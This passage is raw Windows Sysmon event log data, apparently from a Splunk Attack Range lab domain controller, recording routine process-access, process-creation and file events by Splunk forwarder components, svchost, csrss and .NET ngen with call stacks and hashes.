Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:46.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:46.501{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:46.501{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:47.938{59A5CD1D-9146-6005-4502-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\844-0\System.Activities.Core.Presentation.dll2021-01-18 13:46:47.938 10341000x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.422{59A5CD1D-9147-6005-4602-00000000A301}28684956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:47.282{59A5CD1D-9147-6005-4602-00000000A301}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.891{59A5CD1D-9148-6005-4A02-00000000A301}33762828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.751{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9148-6005-4B02-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4B02-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.735{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9148-6005-4B02-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 